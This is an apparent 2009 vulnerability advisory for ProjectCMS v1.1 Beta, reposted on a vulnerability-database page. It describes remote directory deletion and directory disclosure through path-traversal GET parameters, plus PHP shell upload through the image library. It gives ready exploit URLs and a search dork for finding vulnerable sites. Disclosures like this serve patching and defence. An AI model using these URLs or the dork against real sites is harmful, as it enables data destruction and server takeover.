Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21774
HistoryMay 04, 2009 - 12:00 a.m.

MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->

2009-05-0400:00:00
vulners.com
48
JSON

MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta–>

CMS INFORMATION:

–>WEB: http://projectcms.org/
–>DOWNLOAD: http://projectcms.org/uploads/projectcms_1.1_BETA.zip
–>DEMO: http://projectcms.org
–>CATEGORY: CMS / Portal
–>DESCRIPTION: ProjectCMS is an open source community project to create
a simple content management system with an easy to follow install…
–>RELEASED: 2009-05-01

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "Powered by ProjectCMS"
–>CATEGORY: Remote Dir Remove/ Shell Upload-Image Upload/ Remote Dir Disclosure
–>AFFECT VERSION: <= 1.1 Beta
–>Discovered Bug date: 2009-05-01
–>Reported Bug date: 2009-05-01
–>Fixed bug date: 2009-05-02
–>Info patch(v-1.2 Beta): http://projectcms.org/
–>Info extra(v-1.1 Beta): Fixed Sql injection vuln (Reported on 2009-04-29)
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

REMOTE DIR REMOVE:

////////////////////////
#########################

File Vuln: HOME_PATH/admin_includes/admin_theme_remove.php
Var Vuln: GET var "file"
Description: You can remove a dir remotely.

http://[HOST]/[HOME_PATH]/admin_includes/admin_theme_remove.php?file=…/dir-to-remove/

#####################################
/////////////////////////////////////

SHELL UPLOAD/ARBITRARY IMAGE UPLOAD:

/////////////////////////////////////
#####################################

<<<<---------++++++++++++++ Condition: $allowuploads include php extension (not default) ++++++++++++++++±-------->>>>

File Vuln: HOME_PATH/addons/imagelibrary/insert_image.php
Description: You can upload a PHP shell

http://[HOST]/[HOME_PATH]/addons/imagelibrary/insert_image.php

<<<<---------++++++++++++++ If the above condition is not met ++++++++++++++++±-------->>>>

Description: You can upload a arbitrary image

http://[HOST]/[HOME_PATH]/addons/imagelibrary/insert_image.php

##############################
//////////////////////////////

REMOTE DIRECTORY DISCLOSURE:

//////////////////////////////
##############################

File Vuln: HOME_PATH/addons/imagelibrary/select_image.php
Var Vuln: GET var "dir"
Description: You can show arbitrary directory

http://[HOST]/[HOME_PATH]/addons/imagelibrary/select_image.php?dir=…/

#######################################################################
#######################################################################
##*******************************************************************##

ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K …

####
##-------------------------------------------------------------------##
####

GREETZ TO: SPANISH H4ck3Rs community!

##*******************************************************************##
#######################################################################
#######################################################################

JSON